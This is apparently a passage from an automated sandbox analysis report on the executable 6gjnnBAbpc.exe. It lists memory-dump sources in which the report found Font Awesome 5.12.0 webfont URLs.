                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.eot
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.eot?#iefix
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.svg#fontawesome
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.ttf
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.woff
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.woff2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.eot
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.eot?#iefix
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.svg#fontawesome
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.ttf
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.woff
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.woff2
